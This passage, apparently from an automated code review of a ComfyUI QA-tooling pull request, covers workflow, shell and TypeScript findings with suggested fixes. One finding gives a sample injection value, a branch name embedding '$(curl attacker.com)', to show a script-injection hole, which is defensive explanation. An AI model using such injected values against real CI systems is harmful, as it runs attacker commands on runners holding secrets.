successful PrimeVue, litegraph, or role="menuitem" path and return false at the
end, then in loadDefaultWorkflow check the boolean result from clickSubmenuItem
and only set loaded = true when resetToDefaultWorkflow exists or
clickSubmenuItem returned true, otherwise log/handle failure.
- Around line 745-769: The clickByText function currently treats missing/failed
actions as successes (it only console.warns), so update it to return or throw a
failure when the target element is not found or when critical steps fail: if
el.isVisible() is false, immediately return { success: false, reason: 'element
not found', target: text } (or throw an Error); if boundingBox() is null and you
rely on cursor overlay actions, treat that as non-fatal only if you still
successfully click, otherwise return failure; when el.click() rejects, return {
success: false, reason: 'click failed', error: e.message } instead of just
logging; apply the same pattern to related functions referenced in the diff
(moveCursorOverlay, clickCursorOverlay, other click-by-* utilities in the
789-1107 range) so all branches produce a clear failure result or throw, not
just console.warn.
- Around line 1921-1925: The per-pass replay output is being overwritten because
Phase 2 always writes to a deterministic qa-session.webm instead of the
pass-specific name; update the Phase 2 copy/rename logic to use the loop's
videoName variable (constructed from subIssues and sessionLabel) as the
temporary/output filename so each pass writes to a unique file and the later
rename step moves the correct per-pass recording; ensure any hard-coded
"qa-session.webm" occurrences are replaced to reference videoName (and preserve
behavior when subIssues.length === 1 by allowing an empty sessionLabel).
In `@scripts/qa-reproduce.ts`:
- Around line 53-79: The accessibility snapshot returned by
locator.ariaSnapshot() is a YAML string, so instead of casting it to A11yNode,
first await the Promise<string> and parse the YAML into an object (or use
Playwright's parser) before calling searchA11y; update the code that currently
casts the result (where a11yAfter is treated as A11yNode) to await
locator.ariaSnapshot(), parse the YAML into the A11yNode shape, and then pass
that parsed object to searchA11y and subsequent checks so node.name and
node.children are valid.
In `@scripts/qa-video-review.ts`:
- Around line 587-589: The timeout is being passed directly to
model.generateContent which the deprecated `@google/generative-ai` SDK ignores;
update the call to pass the timeout inside a requestOptions object (i.e., when
calling model.generateContent(parts, ...) wrap options.timeoutMs as
requestOptions: { timeout: options.timeoutMs }) so the SDK respects the timeout
setting.
---
Nitpick comments:
In @.github/workflows/pr-qa.yaml:
- Around line 498-642: The inline badge-generation scripts (gen-badge.sh,
gen-badge-dual.sh, gen-badge-box.sh) are large and should be extracted into a
maintained script file; move the contents of each heredoc into a new executable
file under scripts/, e.g. scripts/qa-gen-badge.sh (or separate files
scripts/gen-badge.sh, scripts/gen-badge-dual.sh, scripts/gen-badge-box.sh),
preserve the exact function names/entrypoints (usage comments and variable names
like BUG, FIX, REPRO, add_row) and make them executable, then update the
workflow to call those scripts (replace the heredoc creation steps with simple
cp or checkout references and chmod +x and ensure /tmp/gen-badge.sh,
/tmp/gen-badge-dual.sh, /tmp/gen-badge-box.sh invocations still work) so the
behavior remains identical but the scripts live in the repo for testing and
maintenance.
- Line 494: Replace the global installation command `npm install -g
wrangler@4.74.0` with using npx for the specific wrangler invocation; update any
subsequent calls that rely on a globally installed `wrangler` (references in
deploy-badge.sh and qa-deploy-pages.sh) to invoke `npx wrangler@4.74.0` instead
so the workflow runs the pinned version without installing globally and avoids
modifying the runner's global state.
In `@scripts/qa-batch.sh`:
- Around line 90-92: The current assignment to the variable `extracted` uses
`grep -oP` (Perl-regex) which depends on GNU grep; replace that pipeline with a
portable awk-only extraction (so the section selection with awk then extracting
the digits that follow `[#` without using `-P`), or alternatively add a clear
comment/documentation near the `extracted` assignment stating that GNU grep
(`ggrep`) is required on macOS and fail fast if it's not present; update the
`extracted` assignment (referencing the `extracted` variable and the pipeline
that currently uses `awk ... | grep -oP '\[#\K\d+' | head -n "$TOP_N"`) to use
one of these portable approaches.
In `@scripts/qa-generate-test.ts`:
- Around line 140-144: The current markdown-fence stripping only matches
"```typescript" or "```ts"; update the first replace on the returned text so it
strips any fenced-code language hint instead (e.g., replace the
/^```(?:typescript|ts)?\n?/ pattern used when returning text) by using a single,
broader regex that matches any characters after the opening backticks up to the
newline (for example /^```[^\n]*\n?/), ensuring the final .replace and .trim
logic remain unchanged.
In `@scripts/qa-report-template.html`:
- Line 3: The external marked.js script tag
(src="https://cdn.jsdelivr.net/npm/marked/marked.min.js") lacks SRI and
crossorigin attributes; update the script element to pin a specific version
(e.g., use marked@15.0.7 in the src), compute the SHA-384 base64 hash for that
exact file (using the curl + openssl command shown in the review), and add
integrity="sha384-..." and crossorigin="anonymous" attributes to the tag so the
browser verifies the file before executing.
In `@scripts/qa-video-review.ts`:
- Around line 668-708: The code calls stat(beforeVideoPath) twice: once to log
size into beforeStat and again to populate reportInput.beforeVideoSizeBytes;
reuse the first result instead of calling stat a second time. Keep the existing
beforeStat variable (from the logging block) in scope or rename to
beforeStatCached and then set reportInput.beforeVideoPath = beforeVideoPath and
reportInput.beforeVideoSizeBytes = beforeStatCached.size before calling
buildReportMarkdown; ensure no second await stat(beforeVideoPath) remains.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 57935156-19fa-459c-967e-b6187ecb9074
📒 Files selected for processing (18)
- `.claude/skills/comfy-qa/REPRODUCE.md`
- `.claude/skills/comfy-qa/SKILL.md`
- `.github/workflows/pr-qa.yaml`
- `docs/qa/TROUBLESHOOTING.md`
- `docs/qa/backlog.md`
- `docs/qa/models.md`
- `knip.config.ts`
- `scripts/qa-agent.ts`
- `scripts/qa-analyze-pr.test.ts`
- `scripts/qa-analyze-pr.ts`
- `scripts/qa-batch.sh`
- `scripts/qa-deploy-pages.sh`
- `scripts/qa-generate-test.ts`
- `scripts/qa-record.ts`
- `scripts/qa-report-template.html`
- `scripts/qa-reproduce.ts`
- `scripts/qa-video-review.test.ts`
- `scripts/qa-video-review.ts`
- name: Generate regression test from QA report
  if: needs.resolve-matrix.outputs.mode == 'focused' && steps.pr.outputs.target_type == 'pr'
  env:
    GEMINI_API_KEY: ${{ secrets.GEMINI_API_KEY }}
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
  run: |
    PR_NUM="${{ steps.pr.outputs.number }}"
    PR_BRANCH="${{ github.head_ref || github.ref_name }}"
    if [ -z "$PR_NUM" ]; then
      echo "No PR number, skipping test generation"
      exit 0
    fi

    # Find the first QA report
    REPORT=$(find video-reviews -name '*-qa-video-report.md' -type f | head -1)
    if [ ! -f "$REPORT" ]; then
      echo "No QA report found, skipping test generation"
      exit 0
    fi

    # Ensure we have the PR diff
    DIFF_FILE="${{ runner.temp }}/pr-diff.txt"
    if [ ! -f "$DIFF_FILE" ]; then
      gh pr diff "$PR_NUM" --repo "${{ github.repository }}" > "$DIFF_FILE" 2>/dev/null || true
    fi

    # Generate the test
    TEST_NAME="qa-pr${PR_NUM}"
    TEST_PATH="browser_tests/tests/${TEST_NAME}.spec.ts"
    echo "::group::Generating regression test from QA report"
    pnpm exec tsx scripts/qa-generate-test.ts \
      --qa-report "$REPORT" \
      --pr-diff "$DIFF_FILE" \
      --output "$TEST_PATH" || {
      echo "Test generation failed (non-fatal)"
      exit 0
    }
    echo "::endgroup::"

    # Push to {branch}-add-qa-test
    TEST_BRANCH="${PR_BRANCH}-add-qa-test"
    git checkout -b "$TEST_BRANCH" HEAD 2>/dev/null || git checkout "$TEST_BRANCH" 2>/dev/null || true
    git add "$TEST_PATH"
    git commit -m "test: add QA regression test for PR #${PR_NUM}" || {
      echo "Nothing to commit"
      exit 0
    }
    git push origin "$TEST_BRANCH" --force-with-lease || echo "Push failed (non-fatal)"
    echo "Pushed regression test to branch: $TEST_BRANCH"
Script injection risk: github.head_ref used directly in inline script.
The actionlint warning is valid. github.head_ref is user-controllable (PR branch name set by author) and is used directly in shell commands at line 869 and line 902-909. A malicious branch name like main$(curl attacker.com) could execute arbitrary commands.
Pass it through an environment variable to sanitize:
🔒 Proposed fix to prevent script injection
- name: Generate regression test from QA report
if: needs.resolve-matrix.outputs.mode == 'focused' && steps.pr.outputs.target_type == 'pr'
env:
GEMINI_API_KEY: ${{ secrets.GEMINI_API_KEY }}
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ PR_BRANCH: ${{ github.head_ref || github.ref_name }}
run: |
PR_NUM="${{ steps.pr.outputs.number }}"
- PR_BRANCH="${{ github.head_ref || github.ref_name }}"
if [ -z "$PR_NUM" ]; then
echo "No PR number, skipping test generation"
exit 0
fi

🧰 Tools
🪛 actionlint (1.7.11)
[error] 867-867: "github.head_ref" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details
(expression)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/pr-qa.yaml around lines 862 - 910, The step uses
github.head_ref directly in the inline shell which allows shell injection via
PR_BRANCH and later TEST_BRANCH; set the branch value as a step-level env var
(e.g., env: PR_BRANCH: '${{ github.head_ref || github.ref_name }}') and then in
the script sanitize and safely quote it before use (e.g.,
PR_BRANCH="${PR_BRANCH//[^a-zA-Z0-9._\/-]/_}"; PR_BRANCH="${PR_BRANCH}" and
always quote expansions like "$PR_BRANCH" and "$TEST_BRANCH"), and use safe git
invocations (git checkout -- "$TEST_BRANCH", git push origin -- "$TEST_BRANCH")
so git commands and the branch names (PR_BRANCH, TEST_BRANCH) cannot be used to
inject shell commands.
function ghExec(cmd: string): string {
  try {
    return execSync(cmd, {
      encoding: 'utf-8',
      timeout: 30_000,
      stdio: ['pipe', 'pipe', 'pipe']
    }).trim()
  } catch (err) {
    console.warn(`gh command failed: ${cmd}`)
    console.warn((err as Error).message)
    return ''
  }
}
Fail the job when required GitHub data cannot be fetched.
ghExec() collapses every gh failure into '', and the PR/issue fetchers then build guides from empty title/body/diff instead of stopping. A transient auth, rate-limit, or API failure will silently produce a bogus QA plan that later phases treat as authoritative.
Possible fix
-function ghExec(cmd: string): string {
+function ghExec(cmd: string, required = true): string {
try {
return execSync(cmd, {
encoding: 'utf-8',
timeout: 30_000,
stdio: ['pipe', 'pipe', 'pipe']
}).trim()
} catch (err) {
console.warn(`gh command failed: ${cmd}`)
console.warn((err as Error).message)
- return ''
+ if (required) throw err
+ return ''
}
}
function fetchPrThread(prNumber: string, repo: string): PrThread {
console.warn('Fetching PR thread...')
- const prView = ghExec(
+ const prView = ghExec(
`gh pr view ${prNumber} --repo ${repo} --json title,body,labels`
)
@@
- const issueCommentsRaw = ghExec(
+ const issueCommentsRaw = ghExec(
`gh api repos/${repo}/issues/${prNumber}/comments --paginate`,
+ false
)
@@
- const reviewCommentsRaw = ghExec(
+ const reviewCommentsRaw = ghExec(
`gh api repos/${repo}/pulls/${prNumber}/comments --paginate`,
+ false
)
@@
- const reviewsRaw = ghExec(
+ const reviewsRaw = ghExec(
`gh api repos/${repo}/pulls/${prNumber}/reviews --paginate`,
+ false
)
- const diff = ghExec(`gh pr diff ${prNumber} --repo ${repo}`)
+ const diff = ghExec(`gh pr diff ${prNumber} --repo ${repo}`)

Also applies to: 134-223
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-analyze-pr.ts` around lines 120 - 132, ghExec currently swallows
all gh failures and returns an empty string, which lets PR/issue fetchers (the
functions that call ghExec to get title/body/diff) continue with bogus empty
data; change ghExec to propagate failures by throwing an Error (including the
command, exit code/stderr, and original error message) instead of returning ''
(or alternatively call process.exit(1) after logging), and update the callers in
the PR/issue fetchers to either catch and handle that exception or let it bubble
to fail the job; ensure logs include the gh command, stderr and error.message
for debugging.
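The required-flag variant suggested in the diff above can be sketched as a self-contained unit (a minimal version, without the fetcher wiring):

```typescript
// Sketch: required fetches rethrow so CI fails loudly; optional data
// (comments, reviews) may still degrade to an empty string.
import { execSync } from 'node:child_process'

function ghExec(cmd: string, required = true): string {
  try {
    return execSync(cmd, {
      encoding: 'utf-8',
      timeout: 30_000,
      stdio: ['pipe', 'pipe', 'pipe']
    }).trim()
  } catch (err) {
    console.warn(`gh command failed: ${cmd}`)
    console.warn((err as Error).message)
    if (required) throw err // auth/rate-limit/API failures stop the run
    return '' // caller opted in to best-effort data
  }
}
```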
DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
  --project-name="comfy-qa" \
  --branch="$BRANCH" 2>&1) || true
echo "$DEPLOY_OUTPUT" | tail -5

URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true)
FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev"

echo "url=${URL:-$FALLBACK_URL}" >> "$GITHUB_OUTPUT"
Don't emit a fake Pages URL after a failed deploy.
wrangler pages deploy is wrapped with || true, so auth/upload/validation failures still fall through to writing url=... to GITHUB_OUTPUT. That makes downstream comments look successful even when nothing was actually published.
Possible fix
-DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
- --project-name="comfy-qa" \
- --branch="$BRANCH" 2>&1) || true
+if ! DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
+ --project-name="comfy-qa" \
+ --branch="$BRANCH" 2>&1); then
+ echo "$DEPLOY_OUTPUT" >&2
+ exit 1
+fi
echo "$DEPLOY_OUTPUT" | tail -5
URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true)
FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
if ! DEPLOY_OUTPUT=$(wrangler pages deploy "$DEPLOY_DIR" \
  --project-name="comfy-qa" \
  --branch="$BRANCH" 2>&1); then
  echo "$DEPLOY_OUTPUT" >&2
  exit 1
fi
echo "$DEPLOY_OUTPUT" | tail -5
URL=$(echo "$DEPLOY_OUTPUT" | grep -oE 'https://[a-zA-Z0-9.-]+\.pages\.dev\S*' | head -1 || true)
FALLBACK_URL="https://${BRANCH}.comfy-qa.pages.dev"
echo "url=${URL:-$FALLBACK_URL}" >> "$GITHUB_OUTPUT"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-deploy-pages.sh` around lines 372 - 380, The script currently
masks deployment failures by running `wrangler pages deploy ... 2>&1) || true`
and always writing a fallback `url=` to `GITHUB_OUTPUT`; remove the `|| true`
and instead check the deploy exit status (or inspect `DEPLOY_OUTPUT`) after
running `wrangler pages deploy` and only set `URL`/`FALLBACK_URL` and write to
`GITHUB_OUTPUT` when the deploy succeeded; if the deploy failed, emit an error
(use `echo`/`processLogger` equivalent) and exit non-zero so downstream steps
don't get a fake Pages URL — key symbols to update: `wrangler pages deploy`,
`DEPLOY_OUTPUT`, `URL`, `FALLBACK_URL`, and `GITHUB_OUTPUT`.
async function clickSubmenuItem(page: Page, label: string) {
  // Try PrimeVue tiered menu first (hamburger menu submenus)
  const submenu = page.locator('.p-tieredmenu-submenu:visible').last()
  const primeItem = submenu
    .locator('.p-tieredmenu-item')
    .filter({ hasText: label })
    .first()
  if (await primeItem.isVisible().catch(() => false)) {
    const box = await primeItem.boundingBox().catch(() => null)
    if (box)
      await moveCursorOverlay(
        page,
        box.x + box.width / 2,
        box.y + box.height / 2
      )
    if (box) await clickCursorOverlay(page, true)
    await primeItem.click({ timeout: 5000 }).catch(() => {
      console.warn(`Click on PrimeVue menu item "${label}" failed`)
    })
    if (box) await clickCursorOverlay(page, false)
    await sleep(800)
    return
  }

  // Try litegraph context menu (right-click on nodes/canvas)
  const liteItem = page
    .locator('.litemenu-entry')
    .filter({ hasText: label })
    .first()
  if (await liteItem.isVisible().catch(() => false)) {
    const box = await liteItem.boundingBox().catch(() => null)
    if (box)
      await moveCursorOverlay(
        page,
        box.x + box.width / 2,
        box.y + box.height / 2
      )
    if (box) await clickCursorOverlay(page, true)
    await liteItem.click({ timeout: 5000 }).catch(() => {
      console.warn(`Click on litegraph menu item "${label}" failed`)
    })
    if (box) await clickCursorOverlay(page, false)
    await sleep(800)
    return
  }

  // Try any visible menu/context menu item
  const anyItem = page.locator(`[role="menuitem"]:has-text("${label}")`).first()
  if (await anyItem.isVisible().catch(() => false)) {
    await anyItem.click({ timeout: 5000 }).catch(() => {
      console.warn(`Click on menu role item "${label}" failed`)
    })
    await sleep(800)
    return
  }

  console.warn(`Submenu item "${label}" not found in any menu type`)
}
loadDefaultWorkflow can report success without loading anything.
If resetToDefaultWorkflow is absent, Lines 949-956 resolve successfully, so the fallback menu path never runs. And even in the fallback path, clickSubmenuItem() never signals failure, so loaded becomes true even when neither menu label exists.
Possible fix
-async function clickSubmenuItem(page: Page, label: string) {
+async function clickSubmenuItem(page: Page, label: string): Promise<boolean> {
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
@@
- await sleep(800)
- return
+ await sleep(800)
+ return true
}
console.warn(`Submenu item "${label}" not found in any menu type`)
+ return false
}
@@
case 'loadDefaultWorkflow':
- // Load default workflow via app API (most reliable, no menu navigation)
- try {
- await page.evaluate(() => {
+ const usedApi = await page.evaluate(() => {
const app = (window as unknown as Record<string, unknown>).app as {
loadGraphData?: (d: unknown) => Promise<void>
resetToDefaultWorkflow?: () => Promise<void>
}
- if (app?.resetToDefaultWorkflow) return app.resetToDefaultWorkflow()
- return Promise.resolve()
+ if (!app?.resetToDefaultWorkflow) return false
+ return app.resetToDefaultWorkflow().then(() => true)
})
- await sleep(1000)
- } catch {
+ if (!usedApi) {
await openComfyMenu(page)
await hoverMenuItem(page, 'File')
- const loaded = await clickSubmenuItem(page, 'Load Default')
- .then(() => true)
- .catch(() => false)
+ const loaded = await clickSubmenuItem(page, 'Load Default')
if (!loaded) {
- await clickSubmenuItem(page, 'Default Workflow').catch(() => {})
+ await clickSubmenuItem(page, 'Default Workflow')
}
- await sleep(1000)
}
+ await sleep(1000)
      break

Also applies to: 946-969
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 630 - 687, The loadDefaultWorkflow flow
can mark loaded=true even when no menu action ran because resetToDefaultWorkflow
may be missing and clickSubmenuItem never reports failure; change
clickSubmenuItem to return a boolean (true when it found & clicked a menu entry,
false when none matched) and update loadDefaultWorkflow to use that return value
(and the presence of resetToDefaultWorkflow) to set loaded only when an actual
action occurred; specifically modify clickSubmenuItem (and its callers) to
return true after each successful PrimeVue, litegraph, or role="menuitem" path
and return false at the end, then in loadDefaultWorkflow check the boolean
result from clickSubmenuItem and only set loaded = true when
resetToDefaultWorkflow exists or clickSubmenuItem returned true, otherwise
log/handle failure.
async function clickByText(page: Page, text: string) {
  const el = page.locator(`text=${text}`).first()
  if (await el.isVisible().catch(() => false)) {
    // Get element position for cursor overlay
    const box = await el.boundingBox().catch(() => null)
    if (box) {
      await moveCursorOverlay(
        page,
        box.x + box.width / 2,
        box.y + box.height / 2
      )
    }
    await el.hover({ timeout: 3000 }).catch(() => {})
    await sleep(400)
    if (box) await clickCursorOverlay(page, true)
    await el.click({ timeout: 5000 }).catch((e) => {
      console.warn(
        `Click on "${text}" failed: ${e instanceof Error ? e.message.split('\n')[0] : e}`
      )
    })
    if (box) await clickCursorOverlay(page, false)
    await sleep(500)
  } else {
    console.warn(`Element with text "${text}" not found`)
  }
No-op actions are being reported back as successes.
Several branches only console.warn when the target is missing and then fall through to the final return { success: true }. That means stale selectors and missing menus are fed back into the planner as successful actions, so it loses the signal it needs to retry with a different approach.
Also applies to: 789-1107
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 745 - 769, The clickByText function
currently treats missing/failed actions as successes (it only console.warns), so
update it to return or throw a failure when the target element is not found or
when critical steps fail: if el.isVisible() is false, immediately return {
success: false, reason: 'element not found', target: text } (or throw an Error);
if boundingBox() is null and you rely on cursor overlay actions, treat that as
non-fatal only if you still successfully click, otherwise return failure; when
el.click() rejects, return { success: false, reason: 'click failed', error:
e.message } instead of just logging; apply the same pattern to related functions
referenced in the diff (moveCursorOverlay, clickCursorOverlay, other click-by-*
utilities in the 789-1107 range) so all branches produce a clear failure result
or throw, not just console.warn.
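The result-returning pattern the prompt asks for can be sketched against a minimal Clickable interface (a hypothetical stand-in for the Playwright Locator surface that clickByText uses, so the shape is self-contained):

```typescript
// Sketch: every branch yields an explicit result, so the planner can see
// "element not found" and "click failed" instead of a silent success.
interface Clickable {
  isVisible(): Promise<boolean>
  click(opts?: { timeout?: number }): Promise<void>
}

type ActionResult =
  | { success: true }
  | { success: false; reason: string; target: string }

async function clickChecked(
  el: Clickable,
  target: string
): Promise<ActionResult> {
  if (!(await el.isVisible().catch(() => false))) {
    return { success: false, reason: 'element not found', target }
  }
  try {
    await el.click({ timeout: 5000 })
    return { success: true }
  } catch (e) {
    return {
      success: false,
      reason: `click failed: ${e instanceof Error ? e.message : String(e)}`,
      target
    }
  }
}
```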
case 'cloneNode': {
  // Select node then Ctrl+C/Ctrl+V — works in both legacy and Nodes 2.0
  await page.mouse.click(step.x, step.y)
  await sleep(300)
  await page.keyboard.press('Control+c')
  await sleep(200)
  await page.keyboard.press('Control+v')
  await sleep(500)
  console.warn(`  Cloned node at (${step.x}, ${step.y}) via Ctrl+C/V`)
  break
cloneNode is exercising copy/paste, not Clone.
The prompts and preflight use this action for clone-specific issues, but the implementation just sends Ctrl+C / Ctrl+V. Any regression in the actual Clone command/path will be missed or misclassified.
Also applies to: 1223-1226, 1308-1311
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 1035 - 1044, The current case 'cloneNode'
handler in scripts/qa-record.ts is performing a generic copy/paste
(Ctrl+C/Ctrl+V) which does not exercise the real Clone functionality; replace
the keystroke sequence with a call that invokes the application's actual
Clone/duplicate command (e.g., click the clone/duplicate toolbar/menu/button
element or trigger the app's clone command via the command palette or exposed
API) so tests exercise the Clone code path; update the same pattern in the other
cloneNode occurrences noted (the blocks around the other mentions) to use the
real clone action instead of Ctrl+C/Ctrl+V and emit a matching log message.
for (let i = 0; i < subIssues.length; i++) {
  const subIssue = subIssues[i]
  const sessionLabel = subIssues.length === 1 ? '' : `-${i + 1}`
  const videoName = `qa-session${sessionLabel}.webm`
Per-pass replay videos are being overwritten or mislabeled.
Each pass derives a unique videoName, but Phase 2 always copies the deterministic replay output to qa-session.webm. In multi-pass mode that shared file is reused across passes, and the later rename step can end up storing the idle research-browser capture under the pass-specific name instead.
Possible fix
if (research.verdict === 'REPRODUCED' && research.testCode) {
@@
try {
const videos = execSync(
`find "${testResultsDir}" -name '*.webm' -type f 2>/dev/null`,
{ encoding: 'utf-8' }
)
@@
if (videos.length > 0) {
- execSync(`cp "${videos[0]}" "${opts.outputDir}/qa-session.webm"`)
- console.warn(`Phase 2: Video → ${opts.outputDir}/qa-session.webm`)
+ const replayVideoPath = `${opts.outputDir}/${videoName}`
+ execSync(`cp "${videos[0]}" "${replayVideoPath}"`)
+ console.warn(`Phase 2: Video → ${replayVideoPath}`)
}
} catch {
console.warn('Phase 2: No test video found')
}
@@
- const videoPath = `${opts.outputDir}/${videoName}`
- if (statSync(videoPath, { throwIfNoEntry: false })) {
+ const videoPath = `${opts.outputDir}/${videoName}`
+ if (statSync(videoPath, { throwIfNoEntry: false })) {
console.warn(
'Phase 2 test video exists — skipping research video rename'
)
} else {
renameLatestWebm(opts.outputDir, videoName, knownNames)
      }

Also applies to: 2024-2035, 2055-2065
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-record.ts` around lines 1921 - 1925, The per-pass replay output is
being overwritten because Phase 2 always writes to a deterministic
qa-session.webm instead of the pass-specific name; update the Phase 2
copy/rename logic to use the loop's videoName variable (constructed from
subIssues and sessionLabel) as the temporary/output filename so each pass writes
to a unique file and the later rename step moves the correct per-pass recording;
ensure any hard-coded "qa-session.webm" occurrences are replaced to reference
videoName (and preserve behavior when subIssues.length === 1 by allowing an
empty sessionLabel).
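The per-pass naming rule from the loop can be extracted as a pure function (a hypothetical helper for illustration, not code from the PR):

```typescript
// Sketch: single-pass runs keep the plain name; multi-pass runs get
// -1, -2, ... suffixes so Phase 2 replays never overwrite each other.
function passVideoName(passIndex: number, totalPasses: number): string {
  const sessionLabel = totalPasses === 1 ? '' : `-${passIndex + 1}`
  return `qa-session${sessionLabel}.webm`
}
```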
interface A11yNode {
  role: string
  name: string
  value?: string
  checked?: boolean
  disabled?: boolean
  expanded?: boolean
  children?: A11yNode[]
}

function searchA11y(node: A11yNode | null, selector: string): A11yNode | null {
  if (!node) return null
  const sel = selector.toLowerCase()
  if (
    node.name?.toLowerCase().includes(sel) ||
    node.role?.toLowerCase().includes(sel)
  ) {
    return node
  }
  if (node.children) {
    for (const child of node.children) {
      const found = searchA11y(child, selector)
      if (found) return found
    }
  }
  return null
}
🧩 Analysis chain
🏁 Script executed:
# First, locate the file and check its size
fd -t f "qa-reproduce.ts" --type f
wc -l scripts/qa-reproduce.ts 2>/dev/null || echo "File not found"

Repository: Comfy-Org/ComfyUI_frontend
Length of output: 121
🏁 Script executed:
# Read lines 167-207 to see the actual assertion code
sed -n '167,207p' scripts/qa-reproduce.ts

Repository: Comfy-Org/ComfyUI_frontend
Length of output: 1503
🏁 Script executed:
# Also read lines 53-79 and surrounding context to see the function definitions
sed -n '50,90p' scripts/qa-reproduce.ts

Repository: Comfy-Org/ComfyUI_frontend
Length of output: 1122
🌐 Web query:
Playwright Locator ariaSnapshot() return type documentation
💡 Result:
The Playwright Locator.ariaSnapshot() method returns a Promise<string>, where the string is a YAML representation of the accessibility tree (ARIA snapshot) for the element and its children within the locator's scope. This feature was added in v1.49. Usage example: const snapshot = await page.getByRole('link').ariaSnapshot(); The snapshot string uses YAML markup, with roles, accessible names, attributes, and child elements (e.g., - list "Links": - listitem: - link "Home"). Optional arguments include depth (v1.59+), mode ("ai" | "default", v1.59+), and timeout.
Citations:
- 1: https://playwright.dev/docs/api/class-locator
- 2: https://playwright.dev/docs/next/api/class-locator
- 3: https://github.com/microsoft/playwright/blob/main/docs/src/api/class-locator.md
Parse the ARIA snapshot before traversing it.
Line 195 casts locator.ariaSnapshot() to A11yNode, but the Playwright API returns a Promise<string> containing a YAML-formatted accessibility snapshot, not an object tree. The current code will fail at runtime: when a11yAfter is a string, node.name?.toLowerCase() and node.children evaluate to undefined, causing searchA11y() to always return null. This breaks all assertions—they degrade to NOT FOUND regardless of actual accessibility state. Parse the YAML string (or use a Playwright-provided parser) before passing it to searchA11y().
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@scripts/qa-reproduce.ts` around lines 53 - 79, The accessibility snapshot
returned by locator.ariaSnapshot() is a YAML string, so instead of casting it to
A11yNode, first await the Promise<string> and parse the YAML into an object (or
use Playwright's parser) before calling searchA11y; update the code that
currently casts the result (where a11yAfter is treated as A11yNode) to await
locator.ariaSnapshot(), parse the YAML into the A11yNode shape, and then pass
that parsed object to searchA11y and subsequent checks so node.name and
node.children are valid.
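For the simple indented shape shown in the query result, a dependency-free parse is possible; a sketch assuming only `- role "name":` lines (real snapshots may need a full YAML parser):

```typescript
// Sketch: parse lines like `- list "Links":` / `  - listitem:` into a tree
// that searchA11y can walk. Handles only the minimal shape shown above.
interface A11yNode {
  role: string
  name: string
  children?: A11yNode[]
}

function parseAriaSnapshot(snapshot: string): A11yNode[] {
  const roots: A11yNode[] = []
  const stack: { indent: number; node: A11yNode }[] = []
  for (const line of snapshot.split('\n')) {
    const m = line.match(/^(\s*)- ([\w-]+)(?: "([^"]*)")?:?\s*$/)
    if (!m) continue // skip anything outside the minimal shape
    const indent = m[1].length
    const node: A11yNode = { role: m[2], name: m[3] ?? '' }
    // pop back to this line's parent based on indentation
    while (stack.length && stack[stack.length - 1].indent >= indent) stack.pop()
    if (stack.length === 0) {
      roots.push(node)
    } else {
      const parent = stack[stack.length - 1].node
      ;(parent.children ??= []).push(node)
    }
    stack.push({ indent, node })
  }
  return roots
}
```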
const result = await model.generateContent(parts, {
  timeout: options.timeoutMs
})
🧩 Analysis chain
🌐 Web query:
@google/generative-ai npm package generateContent timeout option API
💡 Result:
The @google/genai npm package (the current Google Gen AI JavaScript SDK, replacing the deprecated @google/generative-ai) supports a timeout option for the generateContent API through the GenerateContentConfig's httpOptions field. Usage: import { GoogleGenAI } from '@google/genai'; const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY }); const response = await ai.models.generateContent({ model: 'gemini-2.5-flash', contents: 'Your prompt here', config: { httpOptions: { timeout: 60000 // milliseconds, e.g., 60 seconds } } }); Note: There is an open bug (as of March 2026) where config.httpOptions.timeout may not work correctly for long generations (>5 minutes), causing hidden errors or ineffective timeouts (GitHub issue #1277). Use AbortSignal as an alternative client-side cancellation: const controller = new AbortController(); setTimeout(() => controller.abort(), 60000); config: { abortSignal: controller.signal } Official documentation confirms httpOptions?: HttpOptions in GenerateContentConfig interface, used to override HTTP request options including timeout.
Citations:
- 1: Support for
config.httpOptions.timeoutoption is broken formodels.generateContentgoogleapis/js-genai#1277 - 2: https://googleapis.github.io/js-genai/release_docs/interfaces/types.GenerateContentConfig.html
- 3: https://tessl.io/registry/tessl/npm-google--genai/1.30.0/docs/content-generation.md
- 4: https://www.npmjs.com/package/@google/genai
- 5: https://googleapis.github.io/js-genai/release_docs/classes/models.Models.html
- 6: https://github.com/googleapis/js-genai/blob/89400098/src/types.ts
🏁 Script executed:
fd package.json | head -5 | xargs cat

Repository: Comfy-Org/ComfyUI_frontend
Length of output: 14674
🏁 Script executed:
rg "@google/generative-ai|@google/genai" --type ts --type json -A 2 | head -30

